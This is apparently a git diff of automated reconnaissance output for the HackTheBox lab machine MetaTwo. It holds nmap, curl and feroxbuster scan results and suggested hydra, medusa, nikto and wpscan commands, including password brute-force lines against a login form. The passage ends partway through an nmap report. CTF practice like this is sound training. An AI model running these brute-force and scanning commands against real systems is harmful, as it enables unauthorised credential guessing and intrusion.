+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.186/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.186 -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.186/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.186 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://10.10.11.186:80 2>&1 | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://10.10.11.186:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_wpscan.txt"
+
--- a/HTB/metatwo/results/scans/_patterns.log
+++ b/HTB/metatwo/results/scans/_patterns.log
@@ -0,0 +1,2 @@
+Identified HTTP Server: nginx/1.18.0
+
--- a/HTB/metatwo/results/scans/_quick_tcp_nmap.txt
+++ b/HTB/metatwo/results/scans/_quick_tcp_nmap.txt
@@ -0,0 +1,39 @@
+# Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.026s latency).
+Scanned at 2023-01-25 11:09:20 EST for 559s
+Not shown: 997 closed tcp ports (conn-refused)
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp     syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|     Invalid command: try being more creative
+|   Verifier: 
+|_    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+80/tcp open  http    syn-ack nginx 1.18.0
+|_http-title: Did not follow redirect to http://metapress.htb/
+|_http-server-header: nginx/1.18.0
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D1543C%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n")%r(Verifier,33,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::fff
+SF:f:10\.10\.11\.186\]\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:39 2023 -- 1 IP address (1 host up) scanned in 559.05 seconds
--- a/HTB/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt
+++ b/HTB/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt
@@ -0,0 +1,22 @@
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 21 "--script=banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.037s latency).
+Scanned at 2023-01-25 11:18:40 EST for 333s
+
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp?    syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|_    Invalid command: try being more creative
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=7%D=1/25%Time=63D1566B%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n");
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:24:13 2023 -- 1 IP address (1 host up) scanned in 333.35 seconds
--- a/HTB/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml
+++ b/HTB/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml
@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 21 &quot;-&#45;script=banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml 10.10.11.186 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 21 &quot;-&#45;script=banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml 10.10.11.186" start="1674663519" startstr="Wed Jan 25 11:18:39 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="21"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="Connect Scan" time="1674663520"/>
+<taskend task="Connect Scan" time="1674663520" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1674663520"/>
+<taskend task="Service scan" time="1674663677" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1674663677"/>
+<taskend task="NSE" time="1674663700"/>
+<taskbegin task="NSE" time="1674663700"/>
+<taskprogress task="NSE" time="1674663731" percent="43.75" remaining="40" etc="1674663771"/>
+<taskprogress task="NSE" time="1674663761" percent="62.50" remaining="37" etc="1674663798"/>
+<taskprogress task="NSE" time="1674663791" percent="87.50" remaining="14" etc="1674663804"/>
+<taskprogress task="NSE" time="1674663821" percent="93.75" remaining="9" etc="1674663829"/>
+<taskend task="NSE" time="1674663821"/>
+<taskbegin task="NSE" time="1674663821"/>
+<taskprogress task="NSE" time="1674663852" percent="0.00"/>
+<taskend task="NSE" time="1674663853"/>
+<host starttime="1674663520" endtime="1674663853"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.186" addrtype="ipv4"/>
+<hostnames>
+<hostname name="metatwo.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ftp" servicefp="SF-Port21-TCP:V=7.93%I=7%D=1/25%Time=63D1566B%P=x86_64-pc-linux-gnu%r(GenericLines,8F,&quot;220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa;  GenericLines: &#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative"><elem key="GenericLines">&#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative</elem>
+</script></port>
+</ports>
+<times srtt="36866" rttvar="36866" to="184330"/>
+</host>
+<taskbegin task="NSE" time="1674663853"/>
+<taskend task="NSE" time="1674663853"/>
+<taskbegin task="NSE" time="1674663853"/>
+<taskend task="NSE" time="1674663853"/>
+<taskbegin task="NSE" time="1674663853"/>
+<taskend task="NSE" time="1674663853"/>
+<runstats><finished time="1674663853" timestr="Wed Jan 25 11:24:13 2023" summary="Nmap done at Wed Jan 25 11:24:13 2023; 1 IP address (1 host up) scanned in 333.35 seconds" elapsed="333.35" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt
+++ b/HTB/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt
@@ -0,0 +1,62 @@
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.023s latency).
+Scanned at 2023-01-25 11:18:40 EST for 1s
+
+PORT   STATE SERVICE REASON  VERSION
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+|_banner: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
+| ssh2-enum-algos: 
+|   kex_algorithms: (9)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|   server_host_key_algorithms: (5)
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ssh-rsa
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:41 2023 -- 1 IP address (1 host up) scanned in 1.82 seconds
--- a/HTB/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml
+++ b/HTB/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml
@@ -0,0 +1,100 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.186 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.186" start="1674663519" startstr="Wed Jan 25 11:18:39 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="22"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663520"/>
+<taskbegin task="Connect Scan" time="1674663520"/>
+<taskend task="Connect Scan" time="1674663520" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1674663520"/>
+<taskend task="Service scan" time="1674663520" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1674663520"/>
+<taskend task="NSE" time="1674663521"/>
+<taskbegin task="NSE" time="1674663521"/>
+<taskend task="NSE" time="1674663521"/>
+<host starttime="1674663520" endtime="1674663521"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.186" addrtype="ipv4"/>
+<hostnames>
+<hostname name="metatwo.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=&#xa;  256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=&#xa;  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2"><table>
+<elem key="fingerprint">c4b44617d2102d8fec1dc927fecd79ee</elem>
+<elem key="bits">3072</elem>
+<elem key="type">ssh-rsa</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=</elem>
+</table>
+<table>
+<elem key="fingerprint">2aea2fcb23e8c529409cab866dcd4411</elem>
+<elem key="bits">256</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=</elem>
+</table>
+<table>
+<elem key="fingerprint">fd78c0b0e22016fa050debd83f12a4ab</elem>
+<elem key="bits">256</elem>
+<elem key="type">ssh-ed25519</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2</elem>
+</table>
+</script><script id="banner" output="SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1"/><script id="ssh2-enum-algos" output="&#xa;  kex_algorithms: (9)&#xa;      curve25519-sha256&#xa;      curve25519-sha256@libssh.org&#xa;      ecdh-sha2-nistp256&#xa;      ecdh-sha2-nistp384&#xa;      ecdh-sha2-nistp521&#xa;      diffie-hellman-group-exchange-sha256&#xa;      diffie-hellman-group16-sha512&#xa;      diffie-hellman-group18-sha512&#xa;      diffie-hellman-group14-sha256&#xa;  server_host_key_algorithms: (5)&#xa;      rsa-sha2-512&#xa;      rsa-sha2-256&#xa;      ssh-rsa&#xa;      ecdsa-sha2-nistp256&#xa;      ssh-ed25519&#xa;  encryption_algorithms: (6)&#xa;      chacha20-poly1305@openssh.com&#xa;      aes128-ctr&#xa;      aes192-ctr&#xa;      aes256-ctr&#xa;      aes128-gcm@openssh.com&#xa;      aes256-gcm@openssh.com&#xa;  mac_algorithms: (10)&#xa;      umac-64-etm@openssh.com&#xa;      umac-128-etm@openssh.com&#xa;      hmac-sha2-256-etm@openssh.com&#xa;      hmac-sha2-512-etm@openssh.com&#xa;      hmac-sha1-etm@openssh.com&#xa;      umac-64@openssh.com&#xa;      umac-128@openssh.com&#xa;      hmac-sha2-256&#xa;      hmac-sha2-512&#xa;      hmac-sha1&#xa;  compression_algorithms: (2)&#xa;      none&#xa;      zlib@openssh.com"><table key="kex_algorithms">
+<elem>curve25519-sha256</elem>
+<elem>curve25519-sha256@libssh.org</elem>
+<elem>ecdh-sha2-nistp256</elem>
+<elem>ecdh-sha2-nistp384</elem>
+<elem>ecdh-sha2-nistp521</elem>
+<elem>diffie-hellman-group-exchange-sha256</elem>
+<elem>diffie-hellman-group16-sha512</elem>
+<elem>diffie-hellman-group18-sha512</elem>
+<elem>diffie-hellman-group14-sha256</elem>
+</table>
+<table key="server_host_key_algorithms">
+<elem>rsa-sha2-512</elem>
+<elem>rsa-sha2-256</elem>
+<elem>ssh-rsa</elem>
+<elem>ecdsa-sha2-nistp256</elem>
+<elem>ssh-ed25519</elem>
+</table>
+<table key="encryption_algorithms">
+<elem>chacha20-poly1305@openssh.com</elem>
+<elem>aes128-ctr</elem>
+<elem>aes192-ctr</elem>
+<elem>aes256-ctr</elem>
+<elem>aes128-gcm@openssh.com</elem>
+<elem>aes256-gcm@openssh.com</elem>
+</table>
+<table key="mac_algorithms">
+<elem>umac-64-etm@openssh.com</elem>
+<elem>umac-128-etm@openssh.com</elem>
+<elem>hmac-sha2-256-etm@openssh.com</elem>
+<elem>hmac-sha2-512-etm@openssh.com</elem>
+<elem>hmac-sha1-etm@openssh.com</elem>
+<elem>umac-64@openssh.com</elem>
+<elem>umac-128@openssh.com</elem>
+<elem>hmac-sha2-256</elem>
+<elem>hmac-sha2-512</elem>
+<elem>hmac-sha1</elem>
+</table>
+<table key="compression_algorithms">
+<elem>none</elem>
+<elem>zlib@openssh.com</elem>
+</table>
+</script><script id="ssh-auth-methods" output="&#xa;  Supported authentication methods: &#xa;    publickey&#xa;    password"><table key="Supported authentication methods">
+<elem>publickey</elem>
+<elem>password</elem>
+</table>
+</script></port>
+</ports>
+<times srtt="22897" rttvar="22897" to="114485"/>
+</host>
+<taskbegin task="NSE" time="1674663521"/>
+<taskend task="NSE" time="1674663521"/>
+<taskbegin task="NSE" time="1674663521"/>
+<taskend task="NSE" time="1674663521"/>
+<runstats><finished time="1674663521" timestr="Wed Jan 25 11:18:41 2023" summary="Nmap done at Wed Jan 25 11:18:41 2023; 1 IP address (1 host up) scanned in 1.82 seconds" elapsed="1.82" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_curl-robots.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_curl-robots.txt
@@ -0,0 +1,15 @@
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_curl.html
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_curl.html
@@ -0,0 +1,16 @@
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
+
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt
@@ -0,0 +1,4 @@
+WLD      GET        7l        9w      145c Got 302 for http://10.10.11.186/e578455e6e054d249578bf7e6c0cd509 (url length: 32)
+WLD         -         -         - http://10.10.11.186/e578455e6e054d249578bf7e6c0cd509 => http://metapress.htb/
+WLD      GET        7l        9w      145c Got 302 for http://10.10.11.186/fd84f08f2434479395436880d4806dcb22b8a6a25bd84c0ab30854d5a635138e9e033de8f46a4034a7119bf91a8e07fb (url length: 96)
+WLD         -         -         - http://10.10.11.186/fd84f08f2434479395436880d4806dcb22b8a6a25bd84c0ab30854d5a635138e9e033de8f46a4034a7119bf91a8e07fb => http://metapress.htb/
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_known-security.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_known-security.txt
@@ -0,0 +1,15 @@
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt
--- a/HTB/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt
+++ b/HTB/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt
@@ -0,0 +1,79 @@
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.028s latency).
+Scanned at 2023-01-25 11:18:40 EST for 81s
+
+PORT   STATE SERVICE REASON  VERSION
